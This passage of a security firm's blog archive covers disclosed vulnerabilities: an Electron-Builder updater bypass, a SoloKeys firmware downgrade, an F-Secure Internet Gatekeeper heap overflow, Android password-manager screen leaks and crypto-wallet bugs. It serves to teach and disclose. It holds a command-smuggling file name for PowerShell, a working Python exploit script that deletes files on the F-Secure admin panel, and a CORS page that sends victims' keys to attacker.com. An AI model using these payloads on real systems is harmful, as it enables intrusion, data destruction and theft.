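    """Quote `value` as a PowerShell single-quoted string literal.

    Inside single quotes, two consecutive single quotes stand for one
    literal quote, so doubling every quote keeps the value inert.
    """
    return "'" + value.replace("'", "''") + "'"


def build_command_escaped(path: str) -> str:
    """Same command, with the file name quoted before interpolation."""
    return f"Get-AuthenticodeSignature {quote_for_powershell(path)} | ConvertTo-Json -Compress"


if __name__ == "__main__":
    name = "v';calc;'ulnerable-app-setup-1.2.3.exe"
    print(build_command(name))          # quotes close early, `calc` becomes a statement
    print(build_command_escaped(name))  # the whole name stays inside one literal
```

With the unescaped version, a name containing a single quote leaves an odd number of quotes in the command, which is exactly the parse error the bypass relies on.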

Impact

An attacker could leverage this fail open design to force a malicious update on Windows clients, effectively gaining code execution and persistence capabilities. This could be achieved in several scenarios, such as a service compromise of the update server, or an advanced MITM attack leveraging the lack of certificate validation/pinning against the update server.

Disclosure Timelines

Doyensec contacted the main project maintainer on November 12th, 2019 providing a full description of the vulnerability together with a Proof-of-Concept. After multiple solicitations, on January 7th, 2020 Doyensec received a reply acknowledging the bug but downplaying the risk.

At the same time (November 12th, 2019), we identified and reported this issue to a number of affected popular applications using the vulnerable electron-builder update mechanism on Windows, including:

Wordpress for Desktop - Still vulnerable in v4.7.0
IOTA Trinity Wallet - Auto-updates feature has been disabled for Windows (#2566, #2588)
Alva - Still vulnerable in v0.9.2
MyMonero - Still vulnerable in v1.1.13
Cozy Drive - Still vulnerable in v3.19.0

On February 15th, 2020, we were made aware that the vulnerability discussed in this blog post had been discussed on Twitter. On February 24th, 2020, we were informed by the package’s maintainer that the issue was resolved in release v22.3.5. While the patch mitigates the potential command injection risk, the fail-open condition is still in place and we believe that other attack vectors exist. After informing all affected parties, we have decided to publish our technical blog post to emphasize the risk of using Electron-Builder for software updates.

Mitigations

Despite its popularity, we would suggest moving away from Electron-Builder due to the lack of secure coding practices and responsiveness of the maintainer.

Electron Forge represents a potential well-maintained substitute, which takes advantage of the built-in Squirrel framework and Electron’s autoUpdater module. Since Squirrel.Windows doesn’t implement signature validation either, for robust signature validation on Windows consider shipping the app to the Windows Store or incorporating minisign into the update workflow.

Please note that using Electron-Builder to prepare platform-specific binaries does not make the application vulnerable to this issue as the vulnerability affects the electron-updater submodule only. Updates for Linux and Mac packages are also not affected.

If migrating to a different software update mechanism is not feasible, make sure to upgrade Electron-Builder to the latest version available. At the time of writing, we believe that other attack payloads for the same vulnerable code path still exist in Electron-Builder.

Standard security hardening and monitoring on the update server is important, as full access on such system is required in order to exploit the vulnerability. Finally, enforcing TLS certificate validation and pinning for connections to the update server mitigates the MITM attack scenario.

Credits

This issue was discovered and studied by Luca Carettoni and Lorenzo Stella. We would like to thank Samuel Attard of the ElectronJS Security WG for the review of this blog post.

Security Analysis of the Solo Firmware

2020-02-19T00:00:00+01:00

This blogpost summarizes the result of a cooperation between SoloKeys and Doyensec, and was originally published on SoloKeys blog by Emanuele Cesena. You can download the full security auditing report here.

We engaged Doyensec to perform a security assessment of our firmware, v3.0.1 at the time of testing. During a 10 person/days project, Doyensec discovered and reported 3 vulnerabilities in our firmware. While two of the issues are considered informational, one issue has been rated as high severity and fixed in v3.1.0. The full report is available with all details, while in this post we’d like to give a high level summary of the engagement and findings.

Why a Security Analysis, Why Now?

One of the first requests we received after Solo’s Kickstarter was to run an independent security audit. At the time we didn’t have resources to run it and towards the end of 2019 I even closed the ticket as won’t fix, causing a series of complaints from the community.

Recently, we shared that we’re building a new model of Solo based on a new microcontroller, the NXP LPC55S69, and a new firmware rewritten in Rust (a blog post on the firmware is coming soon). As most of our energies will be spent on the new firmware, we didn’t want the current STM32-based firmware to be abandoned. We’ll keep supporting it, fixing bugs and vulnerabilities, but it’s likely it will receive less attention from the wider community.

Therefore we thought this was a good time for a security analysis.

We asked Doyensec to detail not just their findings but also their process, so that we can re-validate the new firmware in Rust when released. We expect to run another analysis on the new firmware, although there’s no concrete plan yet.

The Major Finding: Downgrade Attack

The security review consisted of a manual source code review and fuzzing of the firmware. One researcher performed the review for 2 weeks from Jan 21 to Jan 31, 2020.

In short, he found a downgrade attack where he was able to “upgrade” a firmware to a previous version, exploiting the ability to upload the firmware in multiple, unordered chunks. Downgrade attacks are generally very sensitive because they allow an attacker to downgrade to a previous version of the firmware and then take advantage of older known vulnerabilities.

Practically speaking, however, running such an attack against a Solo key requires either physical access to the key or -if attempted on a malicious site- an explicit user acknowledgement on the WebAuthn window.

This means that your key is almost certainly safe. In addition, we always recommend upgrading the firmware with our official tools.

Also note that our firmware is digitally signed and this downgrade attack couldn’t bypass our signature verification. Therefore a possible attacker can only install one of our twenty-ish previous releases.

Needless to say, we took the vulnerability very seriously and fixed it immediately.

Anatomy of the Downgrade Attack

This was the offending code, and this is the patch, which should help explain what happened.

Solo firmware updates are a binary blob where the last 4 bytes represent the version. When a new firmware is installed on the keys, these bytes are checked to ensure that its version is greater than the currently installed one. The firmware digital signature is also verified, but this is irrelevant here, as the attack only allows installing older signed releases.

The new firmware is written to the keys in chunks. At every write, a pointer to the last written address is updated, so that eventually it will point to the new version at the end of the firmware. You might see the issue: we were assuming that chunks are written only once and in order, but this was not enforced. The patch fixes the issue by requiring that the chunks are written strictly in ascending order.

As an example, think of running v3.0.1, and take an old firmware, say v3.0.0. Search it for four bytes which, when interpreted as a version number, appear to be greater than v3.0.1. First, send the whole 3.0.0 firmware to the key. The last_written_app_address pointer now correctly points to the end of the firmware, encoding version 3.0.0.

Then, write again the four chosen bytes at their original location. Now last_written_app_address points somewhere in the middle of the firmware, and those 4 bytes are interpreted as a “random” version. It turns out firmware v3.0.0 contains some bytes which can be interpreted as v3.0.37 – boom! Here is a fully working proof-of-concept.
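The sequence above can be modelled in a few lines. This is a simplified simulation, not the Solo bootloader code: the class `UpdateSession`, the one-byte-per-component version encoding, and the sample firmware bytes are all assumptions made for illustration.

```python
from typing import Tuple

Version = Tuple[int, int, int]


class UpdateSession:
    """Toy model of a chunked firmware update with a 'last written' pointer."""

    def __init__(self, installed: Version, enforce_order: bool) -> None:
        self.installed = installed
        self.enforce_order = enforce_order  # True models the patched behaviour
        self.flash = bytearray()
        self.last_written_end = 0  # plays the role of last_written_app_address

    def write_chunk(self, offset: int, chunk: bytes) -> None:
        if self.enforce_order and offset < self.last_written_end:
            raise ValueError("chunks must be written in strictly ascending order")
        end = offset + len(chunk)
        if end > len(self.flash):
            self.flash.extend(bytes(end - len(self.flash)))
        self.flash[offset:end] = chunk
        self.last_written_end = end  # updated on every write, even a rewrite

    def claimed_version(self) -> Version:
        # Assumed encoding: major, minor, patch, reserved (one byte each),
        # read from the four bytes just before the pointer.
        raw = self.flash[self.last_written_end - 4:self.last_written_end]
        return (raw[0], raw[1], raw[2])

    def is_upgrade(self) -> bool:
        return self.claimed_version() > self.installed


# Hypothetical "v3.0.0" image that happens to contain bytes readable as v3.0.37.
MAGIC = bytes([3, 0, 37, 0])
OLD_FIRMWARE = b"\xAA" * 16 + MAGIC + b"\xBB" * 16 + bytes([3, 0, 0, 0])
MAGIC_OFFSET = OLD_FIRMWARE.index(MAGIC)
```

Writing `OLD_FIRMWARE` at offset 0 and then rewriting `MAGIC` at `MAGIC_OFFSET` leaves the flash contents untouched but moves the pointer, so the unpatched model reports an upgrade; with `enforce_order=True` the second write is rejected.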

Fuzzing TinyCBOR with AFL

The researcher also integrated AFL (American Fuzzy Lop) and started fuzzing our firmware. Our firmware depends on an external library, tinycbor, for parsing CBOR data. In about 24 hours of execution, the researcher exercised the code with over 100M inputs and found over 4k bogus inputs that are misinterpreted by tinycbor and cause a crash of our firmware. Interestingly, the initial inputs were generated by our FIDO2 testing framework.

The fuzzer will be integrated in our testing toolchain soon. If anyone in the community is interested in fuzzing and would like to contribute by fixing bugs in tinycbor we would be happy to share details and examples.

Summary

In summary, we engaged a security engineering company (Doyensec) to perform a security review of our firmware. You can read the full report for details on the process and the downgrade attack they found. For any additional question or for helping with fuzzing of tinycbor feel free to reach out on Twitter @SoloKeysSec or at hello@solokeys.com.

We would like to thank Doyensec for their help in securing the SoloKeys platform. Please make sure to check their website, and oh, they’re also launching a game soon. Yes, a mobile game with a hacking theme!

Heap Overflow in F-Secure Internet Gatekeeper

2020-02-03T00:00:00+01:00

F-Secure Internet Gatekeeper heap overflow explained

This blog post illustrates a vulnerability we discovered in the F-Secure Internet Gatekeeper application. It shows how a simple mistake can lead to an exploitable unauthenticated remote code execution vulnerability.

Reproduction environment setup

All testing should be reproducible in a CentOS virtual machine, with at least 1 processor and 4GB of RAM.

An installation of F-Secure Internet Gatekeeper will be needed. It used to be possible to download it from https://www.f-secure.com/en/business/downloads/internet-gatekeeper. As far as we can tell, the vendor no longer provides the vulnerable version.

The original affected package has the following SHA256 hash: 1582aa7782f78fcf01fccfe0b59f0a26b4a972020f9da860c19c1076a79c8e26.

Proceed with the installation:

(1) If you’re using an x64 version of CentOS, execute yum install glibc.i686
(2) Install the Internet Gatekeeper binary using rpm -i <fsigkbin>.rpm
(3) For a better debugging experience, install gdb 8+ and https://github.com/hugsy/gef

Now you can use GHIDRA/IDA or your favorite disassembler/decompiler to start reverse engineering Internet Gatekeeper!

The target

As described by F-Secure, Internet Gatekeeper is a “highly effective and easy to manage protection solution for corporate networks at the gateway level”.

F-Secure Internet Gatekeeper contains an admin panel that runs on port 9012/tcp. This may be used to control all of the services and rules available in the product (HTTP proxy, IMAP proxy, etc.). This admin panel is served over HTTP by the fsikgwebui binary which is written in C. In fact, the whole web server is written in C/C++; there are some references to civetweb, which suggests that a customized version of CivetWeb may be in use.

The fact that it was written in C/C++ led us down the road of looking for memory corruption vulnerabilities, which are common in these languages.

It did not take long to find the issue described in this blog post by fuzzing the admin panel with Fuzzotron, which uses Radamsa as the underlying engine. Fuzzotron has built-in TCP support for easily fuzzing network services. For a seed, we extracted a valid POST request that is used for changing the language on the admin panel. This request can be performed by unauthenticated users, which made it a good candidate as a fuzzing seed.

When analyzing the input mutated by Radamsa, we could quickly see that the root cause of the vulnerability revolved around the Content-Length header. The generated test that crashed the software had the following header value: Content-Length: 21487483844. This suggests an overflow due to incorrect integer math.

After running the test through gdb we discovered that the code responsible for the crash lies in the fs_httpd_civetweb_callback_begin_request function. This method is responsible for handling incoming connections and dispatching them to the relevant functions depending on which HTTP verbs, paths or cookies are used.

To demonstrate the issue we’re going to send a POST request to port 9012 where the admin panel is running. We set a very big Content-Length header value.

POST /submit HTTP/1.1
Host: 192.168.0.24:9012
Content-Length: 21487483844

AAAAAAAAAAAAAAAAAAAAAAAAAAA

The application will parse the request and execute the fs_httpd_get_header function to retrieve the content length. Later, the content length is passed to the function strtoul (String to Unsigned Long).

The following pseudo code provides a summary of the control flow:

// content_len_old is the raw header string, content_len_new its numeric value
content_len_old = fs_httpd_get_header(header_struct, "Content-Length");
if ( content_len_old ){
   content_len_new = strtoul(content_len_old, 0, 10);
}

What exactly happens in the strtoul function can be understood by reading the corresponding man pages. The return value of strtoul is an unsigned long int, which can have a largest possible value of 2^32-1 (on 32 bit systems).

The strtoul() function returns either the result of the conversion or, if there was a leading minus sign, the negation of the result of the conversion represented as an unsigned value, unless the original (nonnegated) value would overflow; in the latter case, strtoul() returns ULONG_MAX and sets errno to ERANGE. Precisely the same holds for strtoull() (with ULLONG_MAX instead of ULONG_MAX).

As our provided Content-Length is too large for an unsigned long int, strtoul will return the ULONG_MAX value which corresponds to 0xFFFFFFFF on 32 bit systems.

So far so good. Now comes the actual bug. When the fs_httpd_civetweb_callback_begin_request function tries to issue a malloc request to make room for our data, it first adds 1 to the content_len_new variable and then calls malloc.

This can be seen in the following pseudo code:

// fs_malloc == malloc
data_by_post_on_heap = fs_malloc(content_len_new + 1)

This causes a problem as the value 0xFFFFFFFF + 1 will cause an integer overflow, which results in 0x00000000. So the malloc call will allocate 0 bytes of memory.
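The arithmetic can be checked with a short model of 32-bit unsigned behaviour. This is only a sketch: `strtoul32` handles non-negative decimal input and nothing else, and the function names and the 1 MiB limit in the guarded variant are assumptions, not values taken from the product.

```python
ULONG_MAX_32 = 0xFFFFFFFF  # ULONG_MAX when unsigned long is 32 bits wide


def strtoul32(text: str) -> int:
    """Model strtoul() on a 32-bit system: values that overflow saturate at ULONG_MAX."""
    return min(int(text, 10), ULONG_MAX_32)


def malloc_size(content_len: int) -> int:
    """Model `content_len + 1` evaluated in 32-bit unsigned arithmetic."""
    return (content_len + 1) & ULONG_MAX_32


def checked_malloc_size(content_len: int, limit: int = 1 << 20) -> int:
    """Guarded variant: reject oversized bodies before the addition can wrap."""
    if content_len > limit:
        raise ValueError("Content-Length exceeds the accepted maximum")
    return content_len + 1


if __name__ == "__main__":
    length = strtoul32("21487483844")
    print(hex(length))               # 0xffffffff
    print(hex(malloc_size(length)))  # 0x0
```

The guarded variant shows the usual remedy: bound the length first, so that the increment can never wrap around to zero.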

Malloc does allow invocations with a 0 byte argument. When malloc(0) is called, a valid pointer to the heap is returned, pointing to an allocation with the minimum possible chunk size of 0x10 bytes. The specifics can also be read in the man pages:

The malloc() function allocates size bytes and returns a pointer to the allocated memory. The memory is not initialized. If size is 0, then malloc() returns either NULL, or a unique pointer value that can later be successfully passed to free().

If we go a bit further down in the Internet Gatekeeper code, we can see a call to mg_read.

// content_len_new is without the addition of 0x1.
// so content_len_new == 0xFFFFFFFF
if(content_len_new){
    int bytes_read = mg_read(header_struct, data_by_post_on_heap, content_len_new);
}

During the overflow, this code will read an arbitrary amount of data onto the heap - without any restraints. For exploitation, this is a great primitive since we can stop writing bytes to the HTTP stream and the software will simply shut the connection and continue. Under these circumstances, we have complete control over how many bytes we want to write.

In summary, we can leverage malloc's chunks of size 0x10 with an overflow of arbitrary data to overwrite existing memory structures. The following proof of concept demonstrates that. Despite being very raw, it exploits an existing struct on the heap by flipping a flag to should_delete_file = true, and then subsequently spraying the heap with the full path of the file we want to delete. The Internet Gatekeeper internal handler has a decontruct_http method which looks for this flag and removes the file. By leveraging this exploit, an attacker gains arbitrary file removal, which is sufficient to demonstrate the severity of the issue.

from pwn import *
import time
import sys



def send_payload(payload, content_len=21487483844, nofun=False):
    r = remote(sys.argv[1], 9012)
    r.send("POST / HTTP/1.1\n")
    r.send("Host: 192.168.0.122:9012\n")
    r.send("Content-Length: {}\n".format(content_len))
    r.send("\n")
    r.send(payload)
    if not nofun:
        r.send("\n\n")
    return r


def trigger_exploit():
    print "Triggering exploit"
    payload = ""
    payload += "A" * 12             # Padding
    payload += p32(0x1d)            # Fast bin chunk overwrite
    payload += "A"* 488             # Padding
    payload += p32(0xdda00771)      # Address of payload
    payload += p32(0xdda00771+4)    # Junk
    r = send_payload(payload)



def massage_heap(filename):
        print "Trying to massage the heap....."
        for x in xrange(100):
            payload = ""
            payload += p32(0x0)             # Needed to bypass checks
            payload += p32(0x0)             # Needed to bypass checks
            payload += p32(0xdda0077d)      # Points to where the filename will be in memory
            payload += filename + "\x00"
            payload += "C"*(0x300-len(payload))
            r = send_payload(payload, content_len=0x80000, nofun=True)
            r.close()
            cut_conn = True
        print "Heap massage done"


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print "Usage: ./{} <victim_ip> <file_to_remove>".format(sys.argv[0])
        print "Run `export PWNLIB_SILENT=1` for disabling verbose connections"
        exit()
    massage_heap(sys.argv[2])
    time.sleep(1)
    trigger_exploit()
    print "Exploit finished. {} is now removed and remote process should be crashed".format(sys.argv[2])

The exploit currently succeeds in around 60-70% of attempts, and our PoC relies on the specific machine listed in the prerequisites.

Gaining RCE should definitely be possible as we can control the exact chunk size and overwrite as much data as we’d like on small chunks. Furthermore, the application uses multiple threads which can be leveraged to get into clean heap arenas and attempt exploitation multiple times. If you’re interested in working with us, email your RCE PoC to info@doyensec.com ;)

This critical issue was tracked as FSC-2019-3 and fixed in F-Secure Internet Gatekeeper versions 5.40 – 5.50 hotfix 8 (2019-07-11). We would like to thank F-Secure for their cooperation.

Resources for learning about heap exploitation

Tools

GEF - Add-on for GDB to assist exploitation. Also, it has some useful commands for heap exploits debugging
Villoc - Visual representation of the heap in HTML

Internship at Doyensec

2019-11-05T00:00:00+01:00

“Our moral responsibility is not to stop the future, but to shape it…” — Alvin Toffler

At Doyensec, we feel responsible for what the future of information security will look like. We want a safe and open Internet and we believe that hackers play an important role. As a part of our give back strategy, we want to find ways of transferring our knowledge to new generations.

Doyensec interns work alongside experienced security researchers during live customer engagements. They receive full time support from senior staff members and are encouraged to explore individual research projects. Additionally, they are included in all team meetings so they can learn and share in the different experiences arising from our work. In short, we want to provide a comprehensive experience on what it means to be a first-class security consultant in the vulnerability research space.

The internship program @Doyensec represents an opportunity to learn new infosec skills. We also hope it becomes a memorable personal experience. It lasts 2-3 months and is a mix of remote and in-person interactions.

We offer each candidate a transparent recruitment process in 3 simple steps:

1) Introductory call to understand one’s motivation for applying and their availability over the upcoming months
2) Online challenges to evaluate technical skillset (web security testing)
3) Final call to discuss details

Day 1

Day one is important. Interns will be responsible for setting up their Doyensec provided machine and will be introduced to the team. They will be assigned to a senior security researcher who will be at their disposal and act as mentor throughout the entire internship. They will learn how we schedule projects, communicate, and cooperate to ensure complete coverage during our testing activities. We will provide them with all necessary equipment to perform the work. Most importantly, they will learn about our values and things that we consider crucial for delivering high quality work.

Time allocation

While the internship is considered full time over the course of 2-3 months, we did have interns who were still studying and wanted to combine both work and school. We take pride in having a flexible company culture oriented around results and our approach to the internship is no different.

“For knowledge work, time spent has little to do with value created and the forty hour workweek is anachronistic nonsense.” — Naval Ravikant @naval

Work days are generally grouped into two categories:

a) Customer projects. Interns work on real-life projects. Whenever possible, we will try to match personal interest and skillset with tasks when allocating projects.

b) Research time. We strongly believe in research and practice, therefore we allow interns to spend 50% of their time on research topics. We will define goals together and provide guidance and feedback on the progress.

Testimonial

Mohamed Ouad is a student of computer science at the University of Milan. In the fall of 2018 he joined Doyensec as our second intern. We asked him a few questions to summarize his experience:

What did you learn during your internship?
“During this period I had the possibility to learn a lot of things, and not just technical stuff. For instance, I understood how to explain findings to non-technical audience and manage projects with strict deadlines.”

Have you improved your skillset?
“Definitely! I improved my knowledge of Android security and got interested in Google Chrome extensions security, static code review and Electron-based apps security.”

Will the internship have an impact on your career?
“This experience has given me a huge added value to my career path. I’ve not only learned a lot, but also created an important item in my curriculum that will be certainly useful for future opportunities. I suggest this “adventure” to everyone!”

More information on our internship program

The Doyensec internship program is open to students returning to full-time education for at least one semester. We accept candidates with residency in either US or Europe.

What do we offer:

Opportunity to perform professional security testing for both start ups and Fortune 500 companies
Ability to perform cutting-edge offensive research projects
Feedback and guidance
Attractive financial compensation

What do we expect from candidates?

Our perfect candidate:

Has already some experience with manual source code review and Burp Suite / OWASP ZAP
Learns quickly
Should be able to prepare reports in English
Is self-organized
Is able to learn from his/her mistakes
Has motivation to work/study and show initiative
Must be communicative (without this it is difficult to teach effectively)
Brings something to the mix (e.g. creativity, academic knowledge, etc.)

In contrast to full-time positions (we are always hiring web and mobile pentesters!), a good attitude is the most important factor we are looking for.

Do you want to join Doyensec as an intern? Apply via our careers portal!

One Bug To Rule Them All: Modern Android Password Managers and FLAG_SECURE Misuse

2019-08-22T00:00:00+02:00

A few months ago I stumbled upon a 2016 blog post by Mark Murphy, warning about the state of FLAG_SECURE window leaks in Android. This class of vulnerabilities has been around for a while, hence I wasn’t confident that I could still leverage the same weakness in modern Android applications. As it often turns out, I was being too optimistic. After a brief survey, I discovered that the issue still persists today in many password manager applications (and others).

The problem

The FLAG_SECURE setting was initially introduced as an additional setting to WindowManager.LayoutParams to prevent DRM-protected content from appearing in screenshots, video screencaps or from being viewed on “non-secure displays”.

This last term was created to distinguish between virtual screens created by the MediaProjection API (a native API to capture screen contents) and physical display devices like TV screens (having a DRM-secure video output). In this way Google forestalled the piracy apps issue by preventing unsigned apps from creating virtual “secure” displays, only allowing casting to physical “secure” devices.
While FLAG_SECURE nowadays serves its original purpose well (to the delight of e.g. Netflix, Google Play Movies, YouTube Red), over the years developers mistook this “secure” flag for an easy catch-all security feature provided by Android to exclude the entire app from screen captures or recordings.

Unfortunately, this functionality is not global for the entire app, but can only be set on specific screens that contain sensitive data. To make matters worse, Android fragments used in the application will not respect the FLAG_SECURE set for the activity, and the flag is not passed down to any other Window instances created on behalf of that activity. As a consequence, several native UI components like Spinner, Toast, Dialog, PopupWindow and many others will still leak their content to third-party applications having the right permissions.

The approach

After a short survey, I decided to investigate a category of apps in which a content leak would have had the biggest impact: mobile password managers. This would also be the category of applications a generic attacker would probably choose to target first, along with banking apps.
With this in mind, I fired up a screen capture application (mnml) and started poking around. After a few days of testing, every Android password manager examined (4) was found to be vulnerable to some extent.

The following sections provide a summary of the discovered issues. All vulnerabilities were disclosed to the vendors throughout the second week of May 2019.

1Password

In 1Password, the Account Settings section offers a way to manage 1Password accounts. One of the functionalities is “Large Type”, which allows showing an account’s Secret Key in a large, easy-to-read format. The fragment showing the Secret Key leaks it to third-party applications installed on the victim’s device. The Secret Key is combined with the user’s Master Password to create the full encryption key used to encrypt the account's data, protecting it on the server side.

This was fixed in 1Password for Android in version 7.1.5, which was released on May 29, 2019.

Keeper

When a user taps the password field, Keeper shows a “Copied to Clipboard” toast. But if the user shows the cleartext password with the “Eye” icon, the toast will also contain the secret cleartext password. This fragment showing the copied password leaks the password to third-party applications.

This was fixed in Keeper for Android version 14.3.0, which was released on June 21, 2019. An official advisory was also issued.

Dashlane

Dashlane features a random password generation functionality, usable when an account entry is inserted or edited. Unfortunately, the window responsible for choosing the parameters for the “safe” passwords is visible to third-party applications on the victim’s device.

Note that it is also possible for an attacker to infer the service associated with the leaked password, since the services list and autocomplete fragment is also missing the FLAG_SECURE flag, resulting in its leak.

The issue was fixed in Dashlane for Android in version 6.1929.2.

The attack scenario

Several scenarios would result in an app being installed on a user’s phone recording their activity. These include:

Malicious casting apps requiring record permission, since users usually don’t know that casting apps can also record their screen;
Innocuous-looking apps using Cloak & Dagger attacks;
Malicious app installed through third-party Android app stores or bypassing PHA detection filters of the Play Store;
Malicious app pushed to the smartphone using the Play Store feature in a Man-in-the-Browser attack scenario.

If these scenarios seem unlikely to happen in real life, it is worth noting that there have been several instances of apps abusing this class of attacks in the recent past.

Many thanks to the 1Password, Keeper, and Dashlane security teams that handled the report in a professional way, issued a payout, and allowed the disclosure. Please remember that using a password manager is still the best choice these days to protect your digital accounts and that all the above issues are now fixed.

As always, this research was possible thanks to my 25% research time at Doyensec!

Lessons in auditing cryptocurrency wallets, systems, and infrastructures

2019-08-01T00:00:00+02:00

In the past three years, Doyensec has been providing security testing services for some of the global brands in the cryptocurrency world. We have audited desktop and mobile wallets, exchange web interfaces, custody systems, and backbone infrastructure components.

We have seen many things done right, but also discovered many design and implementation vulnerabilities. Failure is a great lesson in security and can always be turned into positive teaching for the future. Learning from past mistakes is the key to creating better systems.

In this article, we will guide you through a selection of four simple (yet dangerous!) application vulnerabilities.

Breaking Crypto Currency Systems != Breaking Crypto (at least not always)

For that, you would probably need to wait for Jean-Philippe Aumasson’s talk at the upcoming BlackHat Vegas.

This blog post was brought to you by Kevin Joensen and Mateusz Swidniak.

1) CORS Misconfigurations

Cross-Origin Resource Sharing is used for relaxing the Same Origin Policy. This mechanism enables communication between websites hosted on different domains. A misconfigured CORS can have a great impact on the website security posture as other sites might access the page content.

Imagine a website with the following HTTP response headers:

Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true

If an attacker has successfully lured a victim to their website, they can easily issue an HTTP request with a null origin using an iframe tag and a sandbox attribute.

<iframe sandbox="allow-scripts" src="https://attacker.com/corsbug" />

<html>
<body>
<script>
var req = new XMLHttpRequest();
req.onload = callback;
req.open('GET', 'https://bitcoinbank/keys', true);
req.withCredentials = true;
req.send();

function callback() {
    location='https://attacker.com/?dump='+this.responseText;
};
</script>
</body>
</html>

When the victim visits the crafted page, the attacker can perform a request to https://bitcoinbank/keys and retrieve their secret keys.

This can also happen when the Access-Control-Allow-Origin response header is dynamically updated to the same domain as specified by the Origin request header.

Checklist:

Ensure that your Access-Control-Allow-Origin is never set to null
Ensure that Access-Control-Allow-Origin is not taken from a user-controlled variable or header
Ensure that you are not dynamically copying the value of the Origin HTTP header into Access-Control-Allow-Origin
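The checklist above can be sketched as a strict allowlist check. This is a minimal illustration, not a drop-in middleware: the ALLOWED_ORIGINS values and the cors_headers helper are hypothetical, and a real application would plug an equivalent check into its own framework.

```python
from typing import Optional

# Hypothetical allowlist; replace with the origins your application actually trusts.
ALLOWED_ORIGINS = frozenset({"https://app.example.com", "https://admin.example.com"})


def cors_headers(origin: Optional[str]) -> dict:
    """Return CORS response headers only for exactly matching, pre-approved origins."""
    if origin is None or origin not in ALLOWED_ORIGINS:
        # Unknown origins (including the literal string "null") get no CORS headers.
        return {}
    return {
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Credentials": "true",
        "Vary": "Origin",
    }


print(cors_headers("https://app.example.com"))
print(cors_headers("null"))
print(cors_headers("https://attacker.com"))
```

The header value is only emitted after an exact match against a fixed set, so it is never a blind copy of the request's Origin header, and prefix or substring matching is deliberately avoided.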

2) Asserts and Compilers

In some programming languages, optimizations performed by the compiler can have undesirable results. This could manifest in many different quirks due to specific compiler or language behaviors, however there is a specific class of idiosyncrasies that can have devastating effects.

Let’s consider this Python code as an example:

# All deposits should belong to the same CRYPTO address
assert all([x.deposit_address == address for x in deposits])

At first sight, there is nothing wrong with this code. Yet, there is actually a quite severe bug. The problem is that assert statements are only executed while __debug__ is true, which is the default when running Python. When the code is run with the -O flag or compiled to optimized byte code (*.pyo files, or *.opt-1.pyc since Python 3.5) and lands in production, all asserts are gone. As a result, the application will not enforce any security checks.
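The effect is easy to reproduce locally. The sketch below runs the same one-line snippet in a child interpreter with and without -O; the SNIPPET string and the run_snippet helper are made up for this illustration, and the result assumes the PYTHONOPTIMIZE environment variable is not set.

```python
import subprocess
import sys

# The assert stands in for a security check; the print marks code that should be unreachable.
SNIPPET = "assert False, 'security check failed'; print('check skipped')"


def run_snippet(optimized: bool) -> subprocess.CompletedProcess:
    """Run SNIPPET in a child interpreter, optionally with the -O flag."""
    cmd = [sys.executable] + (["-O"] if optimized else []) + ["-c", SNIPPET]
    return subprocess.run(cmd, capture_output=True, text=True)


normal = run_snippet(optimized=False)
optimized = run_snippet(optimized=True)
print("default run exit code:", normal.returncode)
print("-O run exit code:", optimized.returncode, "stdout:", optimized.stdout.strip())
```

In the default run the interpreter stops with an AssertionError, while the -O run should exit cleanly after executing the code that the assert was meant to guard.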

Similar behaviors exist in many languages and with different compiler options, including C/C++, Swift, Closure and many more.

For example, let’s consider the following Swift code:

// No assertion failure if password == "mysecretpw"
if (password != "mysecretpw") {
   assertionFailure("Password not correct!")
}

If you were to run this code in Xcode, then it would simply hit your assertionFailure in case of an incorrect password. This is because Xcode compiles debug builds without any optimizations using the -Onone flag. If you were to build the same code for the App Store instead, the check would be optimized out, leaving no password check at all since execution simply continues. Note that there are many things wrong in those three lines of code.

Talking about assertions, PHP takes the first place and de-facto facilitates RCE when you run asserts with a string argument. This is due to the argument getting evaluated through the standard eval.

Checklist:

Do not use assert statements for guarding code and enforcing security checks
Research compiler optimization gotchas in the language you use
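As a sketch of the first checklist item, the deposit check from the Python example can be written as an explicit validation that raises an exception, so it keeps working under python -O. The Deposit dataclass and the ensure_same_address name are hypothetical stand-ins for the objects in the original snippet.

```python
from dataclasses import dataclass
from typing import Iterable


@dataclass
class Deposit:
    deposit_address: str  # hypothetical stand-in for the article's deposit objects


def ensure_same_address(deposits: Iterable[Deposit], address: str) -> None:
    """Raise ValueError unless every deposit targets `address`."""
    for deposit in deposits:
        if deposit.deposit_address != address:
            raise ValueError("deposit does not belong to the expected address")


ensure_same_address([Deposit("addr1"), Deposit("addr1")], "addr1")  # passes silently
try:
    ensure_same_address([Deposit("addr1"), Deposit("addr2")], "addr1")
except ValueError as exc:
    print(f"rejected: {exc}")
```

Unlike assert, an if statement followed by raise is ordinary control flow and is not removed by optimization flags.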

3) Arithmetic Errors

A bug class that is also easy to overlook in fin-tech systems pertains to arithmetic operations. Negative numbers and overflows can create money out of thin air.

For example, let’s consider a withdrawal function that looks for the amount of money in a certain wallet. Being able to pass a negative number could be abused to generate money for that account.

Imagine the following example code:

if data["wallet"].balance < data["amount"]:
    error_dict["wallet_balance"] = ("Withdrawal exceeds available balance")
...    
data["wallet"].balance = data["wallet"].balance - data["amount"]

The if statement correctly checks if the balance is higher than the requested amount. However, the code does not enforce the use of a positive number.

Let’s try with -100 coins in a wallet account having 200 coins.

The check would be satisfied and the code responsible for updating the amount would look like the following:

data["wallet"].balance = 200 - (-100) # 300 coins

This would enable an attacker to get free money out of the system.
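A minimal sketch of a safer withdrawal routine is shown below. It assumes amounts are handled as Decimal values; the withdraw function and the WithdrawalError type are hypothetical names introduced for this example.

```python
from decimal import Decimal


class WithdrawalError(ValueError):
    """Raised when a withdrawal request is rejected (hypothetical exception type)."""


def withdraw(balance: Decimal, amount: Decimal) -> Decimal:
    """Return the new balance, rejecting non-positive and oversized amounts."""
    if not amount.is_finite() or amount <= 0:
        raise WithdrawalError("amount must be a positive number")
    if amount > balance:
        raise WithdrawalError("withdrawal exceeds available balance")
    return balance - amount


print(withdraw(Decimal("200"), Decimal("50")))  # 150
try:
    withdraw(Decimal("200"), Decimal("-100"))
except WithdrawalError as exc:
    print(f"rejected: {exc}")
```

Checking the sign before comparing against the balance closes the hole described above, and rejecting NaN and infinite values avoids surprises in later comparisons.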

Talking about numbers and arithmetic, there are also well-known bugs affecting lower-level languages in which signed vs unsigned types come to play.

